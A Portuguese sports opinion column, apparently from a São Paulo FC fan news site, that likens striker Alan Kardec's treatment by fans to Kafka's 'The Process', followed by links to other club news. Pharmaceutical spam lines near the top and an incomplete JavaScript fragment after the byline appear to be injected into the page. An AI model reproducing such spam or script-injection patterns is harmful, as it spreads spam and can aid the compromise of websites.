Noticias

O caso Kardec

acquire cheaply generic pills no rx

order at an easy rate generic pills no rx Buy cheap Viagra online

Em “O Processo”, livro de Franz Kafka, o cidadão Josef K., trabalhador exemplar e cumpridor de suas obrigações; na manhã em que completaria 30 anos, sem explicações ou justificativas, é detido por dois guardas. Diante da situação nonsense, K. parte em busca de respostas para estabelecer um ponto de partida, uma premissa, no sentido de compreender do que estava sendo acusado. Porém, durante o interrogatório, nem o inspetor, nem os guardas possuíam informações para esclarecer o motivo da prisão.

A situação do atacante Alan Kardec, no São Paulo, assemelha-se à do personagem Josef K. No dia 13 de abril de 2016, há exatamente um mês da data em que completará dois anos no Tricolor, Kardec sofre um processo de uma perseguição sem sentido.

Depois de grande temporada pelo Palmeiras, a diretoria do São Paulo investiu R$ 14 milhões para tirá-lo do rival. O atacante chegou e foi peça importante no São Paulo vice-campeão do Brasileirão 2014, então sob o comando de Muricy, que estabeleceu um belo quarteto ofensivo formado por Kardec, Ganso, Pato e Kaká. Como no Brasil a memória é uma bola que se perde na linha de fundo, os torcedores também já esqueceram que Kardec, em 2014, chegou até à Seleção Brasileira.

Nesses tempos de obsessão pelo futebol compacto, onde todos marcam e todos atacam, Kardec possui uma característica essencial, que é compor a marcação, estabelecendo pressão desde a saída de bola do adversário. Além de excelente presença na área, Kardec, com inteligência acima da média da boleirada, tem consciência e disciplina tática. Joga em buscas de gols, como é o dna de toda atacante, mas também para o time, o conjunto.

Como se Kafka escrevesse mais um capítulo de “O Processo”, considerando os absurdos do mundo da bola, Kardec, que ficou tempo parado devido a lesões, agora luta para reencontrar-se com boas atuações, os gols e, assim, livrar-se da perseguição da torcida, que o acusa e o absolve de forma volátil, arquibancando-se em argumentos imediatistas, simplistas e descontextualizados.

O tribunal de Kardec, formado por torcedores movidos pelo estado-presente, transcorre-se com base nas mesmas alegorias em que Josef K foi acusado. Para o torcedor parece só existir o aqui-agora, elemento de tempo que arrebenta com jogadores, planejamentos, técnicos e os cofres dos clubes.

Considerando a escassez de bons jogadores no mercado, dólar em alta, a falta de dinheiro dos clubes para novos investimentos e, sobretudo, uma questão de justiça, a função de Bauza e da diretoria é recuperarem o atacante, muito importante para a formação do elenco Tricolor, que luta para avançar na Libertadores, no Paulista e ainda terá de percorrer o caminho do Brasileirão.

Não pode haver lastro com a verdade a notícia de que o São Paulo estaria disposto a envolver Kardec em uma troca por Fred, do Fluminense, que já se acertou com o clube das Laranjeiras. Primeiro, porque seria uma atitude absurda da diretoria rasgar os R$ 14 milhões investidos; segundo, porque o atacante tem potencial para jogar no São Paulo, ainda mais sob o contexto de que Calleri sairá no meio do ano.


Kardec é bom jogador, e bom de grupo. Mesmo com a titularidade de Calleri, mantem-se firme, aguardando uma nova chance. Muito diferente de Kieza, em que o São Paulo investiu R$ 4 milhões em um jogador mediano, que se auto-considerou craque, e chegou ao ponto de menosprezar um clube três vezes campeão das Américas, três vezes campeão mundial, e que disputa pela Libertadores. Isso sim é digno de um relato kafkiano.

A diretoria do São Paulo não pode incorrer ao erro das medidas popularescas, que tramitam nas arquibancadas. Afinal, ainda que o ditado diga que “a voz do povo é a voz de Deus”, há que se lembrar que um dia, na História da humanidade, o povo condenou Jesus à cruz e libertou Barrabás.

Por: Ricardo Flaittd.getElementsByTagName(‘head’)[0].appendChild(s);

Clique para adicionar um comentário

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Noticias

Mais em Noticias

hernanes

Liderado por Hernanes, São Paulo espera viver um ‘novo campeonato’ no 2º turno

saopauloadmin15 de agosto de 2017
gilberto

Gilberto rejeita rótulo de amuleto e pede São Paulo conservador

saopauloadmin14 de agosto de 2017
pratto

Pratto sobre futuro no São Paulo: “Não sou de sair de clube em seis meses, um ano”

saopauloadmin11 de agosto de 2017
lucas

Garotada ganha espaço com o comandante

saopauloadmin10 de agosto de 2017
elenco

Organização e confiança no São Paulo contra o rebaixamento

saopauloadmin7 de agosto de 2017
junior

Relacionados para Bahia x São Paulo

saopauloadmin5 de agosto de 2017
nem

Wellington Nem não joga mais pelo Tricolor

saopauloadmin2 de agosto de 2017
hernanes

Novo Hernanes estuda engenharia, tem bigode e mais amor pelo São Paulo

saopauloadmin1 de agosto de 2017
marcos

Marcos Guilherme celebra estreia com gols e vitória pelo São Paulo

saopauloadmin29 de julho de 2017